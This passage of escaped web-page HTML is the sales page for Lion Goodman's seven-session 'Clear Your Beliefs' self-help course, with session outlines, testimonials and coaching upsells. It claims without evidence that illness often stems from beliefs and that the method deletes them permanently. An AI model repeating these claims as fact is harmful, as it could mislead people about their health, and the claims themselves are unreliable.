return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author 